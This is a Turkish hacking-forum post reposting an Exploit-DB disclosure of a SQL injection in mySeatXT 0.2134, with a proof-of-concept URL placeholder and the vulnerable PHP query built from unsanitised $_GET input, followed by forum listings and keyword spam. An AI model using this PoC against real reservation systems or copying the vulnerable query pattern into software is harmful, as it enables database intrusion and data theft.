Konuyu Oyla:
  • Derecelendirme: 3/5 - 2 oy
  • 1
  • 2
  • 3
  • 4
  • 5
mySeatXT 0.2134 SQL Enjeksiyon Açığı
#1
Kod:
########################################################################################
[+] Exploit: mySeatXT 0.2134                                                           #
[+] Author: vinicius777                                                #
[+] Contact: vinicius777 [AT] gmail  @vinicius777_                                     #                    
[+] Vendor Homepage: http://sourceforge.net/projects/myseat                            #
########################################################################################

  
[1] Sql Injection
  

PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']
  


Vulnerable Code:
[+] autocomplete_res.php


$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/31144/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 191 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 114 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
  Natural Software CMS Yönetici Atlatma Açığı KingSkrupellos 7 123 30-11-2016, Saat: 02:56
Son Yorum: 0xfans
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 104 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 10 165 27-11-2016, Saat: 11:37
Son Yorum: R3D
Anahtar Kelimeler

mySeatXT 0.2134 SQL Enjeksiyon Açığı indir, mySeatXT 0.2134 SQL Enjeksiyon Açığı Videosu, mySeatXT 0.2134 SQL Enjeksiyon Açığı Online izle, mySeatXT 0.2134 SQL Enjeksiyon Açığı Bedava indir, mySeatXT 0.2134 SQL Enjeksiyon Açığı Yükle, mySeatXT 0.2134 SQL Enjeksiyon Açığı Hakkında, mySeatXT 0.2134 SQL Enjeksiyon Açığı Nedir, mySeatXT 0.2134 SQL Enjeksiyon Açığı Free indir, mySeatXT 0.2134 SQL Enjeksiyon Açığı Oyunu, mySeatXT 0.2134 SQL Enjeksiyon Açığı Download


1 Ziyaretçi